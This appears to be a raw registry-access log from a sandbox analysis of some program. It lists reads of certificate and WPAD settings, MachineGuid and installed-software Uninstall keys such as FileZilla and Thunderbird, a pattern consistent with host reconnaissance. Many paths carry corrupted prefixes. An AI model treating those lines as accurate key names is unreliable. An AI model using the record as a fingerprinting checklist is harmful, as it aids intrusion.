HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakMD5AllFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\WeakMD5ThirdPartySha256Allow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\WeakMD5AllSha256Allow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakMD5ThirdPartySha256Allow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakMD5AllSha256Allow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\WeakSHA1ThirdPartyFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakSHA1ThirdPartyFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakSHA1ThirdPartyAfterTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\WeakSHA1AllFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakSHA1AllFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\WeakSHA1ThirdPartySha256Allow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\WeakSHA1AllSha256Allow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakSHA1ThirdPartySha256Allow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakSHA1AllSha256Allow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\WeakRSAThirdPartyFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakRSAThirdPartyFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\WeakRSAAllFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakRSAAllFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\WeakDSAThirdPartyFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakDSAThirdPartyFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\WeakDSAAllFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakDSAAllFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\WeakECDSAThirdPartyFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakECDSAThirdPartyFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\WeakECDSAAllFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default\WeakECDSAAllFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1339698970-4093829097-1161395185-1000\ProfileImagePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\109F1CAED645BB78B3EA2B94C0697C740733031C\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\D559A586669B08F46A30A133F8A9ED3D038E2EA8\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\FEE449EE0E3965A5246F000E87FDE2A065FD89D4\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs\A377D1B1C0538833035211F4083D00FECC414DAB\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\1916A2AF346D399F50313C393200F14140456616\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\2A83E9020591A55FC6DDAD3FB102794C52B24E70\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\2B84BFBB34EE2EF949FE1CBE30AA026416EB2216\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\305F8BD17AA2CBC483A4C41B19A39A0C75DA39D6\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\367D4B3B4FCBBC0B767B2EC0CDB2A36EAB71A4EB\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\3A850044D8A195CD401A680C012CB0A3B5F8DC08\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\40AA38731BD189F9CDB5B9DC35E2136F38777AF4\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\43D9BCB568E039D073A74A71D8511F7476089CC3\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\471C949A8143DB5AD5CDF1C972864A2504FA23C9\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\51C3247D60F356C7CA3BAF4C3F429DAC93EE7B74\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\5DE83EE82AC5090AEA9D6AC4E7A6E213F946E179\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\61793FCBFA4F9008309BBA5FF12D2CB29CD4151A\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\63FEAE960BAA91E343CE2BD8B71798C76BDB77D0\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\6431723036FD26DEA502792FA595922493030F97\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\7D7F4414CCEF168ADF6BF40753B5BECD78375931\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\80962AE4D6C5B442894E95A13E4A699E07D694CF\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\86E817C81A5CA672FE000F36F878C19518D6F844\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\8E5BD50D6AE686D65252F843A9D4B96D197730AB\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\9845A431D51959CAF225322B4A4FE9F223CE6D15\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\B533345D06F64516403C00DA03187D3BFEF59156\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\B86E791620F759F17B8D25E38CA8BE32E7D5EAC2\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\C060ED44CBD881BD0EF86C0BA287DDCF8167478C\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\CEA586B2CE593EC7D939898337C57814708AB2BE\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\D018B62DC518907247DF50925BB09ACF4A5CB3AD\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\F8A54E03AADC5692B850496A4C4630FFEAA29D83\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\FA6660A94AB45F6A88C0D7874D89A863D74DEE97\Blob
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\ProtectedRoots\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3B1EFD3A66EA28B16697394703A72CA340A05BD5\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7F88CD7223F3C813818C994614A89C99FA3B5247\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\8F43288AD272F3103B6FB1428485EA3014C0BCFE\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A43489159A520F0D93D032CCAF37E7FE20A8B419\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BE36A4562FB2EE05DBB3D32323ADF445084ED656\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CDD4EEAE6000AC7F40C3802C171E30148030C072\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3679CA35668772304D30A5FB873B0FA77BB70D54\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4F65566336DB6598581D584A596C87934D5F2AB4\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4F65566336DB6598581D584A596C87934D5F2AB4\BlobCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4F65566336DB6598581D584A596C87934D5F2AB4\BlobLength
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\627F8D7827656399D27D7F9044C9FEB3F33EFA9A\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742C3192E607E424EB4549542BE1BBC53E6174E2\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\75E0ABB6138512271C04F85FDDDE38E4B7242EFE\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\97817950D81C9670CC34D809CF794431367EF474\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\UserenvDebugLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate\DisallowedCertLastSyncTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate\DisallowedCertEncodedCtl
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
\x8260\x5eaEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Linkage\Export
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadExpirationDays
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
\x57f8\x5afEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName
\x57f8\x5afEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player NPAPI\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player NPAPI\DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FileZilla Client\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FileZilla Client\DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft .NET Framework 1.1 (1033)\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 75.0 (x86 en-GB)\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 75.0 (x86 en-GB)\DisplayVersion
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 60.5.0 (x86 en-US)\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 60.5.0 (x86 en-US)\DisplayVersion
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Pillow-py2.7\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Pillow-py2.7\DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Skype_is1\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Skype_is1\DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{09CC0C6D-0822-491E-A10E-2A8443DDF170}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{09CC0C6D-0822-491E-A10E-2A8443DDF170}\DisplayVersion
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{12B4F371-ACE2-435B-BCF1-623F36C4E176}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{12B4F371-ACE2-435B-BCF1-623F36C4E176}\DisplayVersion
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83217017FF}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83217017FF}\DisplayVersion
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2E818780-AC79-4BC0-8023-C1CC46EAC9B6}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2E818780-AC79-4BC0-8023-C1CC46EAC9B6}\DisplayVersion
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{45CEE0C6-5BB2-4A8B-B83C-58559A1CA424}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{45CEE0C6-5BB2-4A8B-B83C-58559A1CA424}\DisplayVersion
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayVersion
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayVersion
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{69078E18-ECA4-44AA-9F75-468CA96D94E0}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{69078E18-ECA4-44AA-9F75-468CA96D94E0}\DisplayVersion
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{6BA6203C-85AB-4B9E-8582-CE31B1B5C0ED}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{6BA6203C-85AB-4B9E-8582-CE31B1B5C0ED}\DisplayVersion
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{049FE6FA-0D59-4C24-960E-FDA1DDF045EE}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{1EE5FA17-F624-438C-B7AC-7C5A41E90FA2}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{287A1E92-9E41-4BC1-8920-B3D0E9220800}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{2AB483F1-C86E-427A-83B4-23889B03512D}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{2BA40F82-F3A4-441C-BF1A-ED4C42FF4872}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{302A8FE3-EBF5-486C-A431-16A1CD914443}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{334FB202-28D7-4BA4-8BC9-4FE4AB233EA0}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{38CF30E4-3348-4BD1-A859-B630C355A56F}\DisplayName
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{39767ECA-1731-45DB-AB5B-6BF40E151D66}\DisplayName
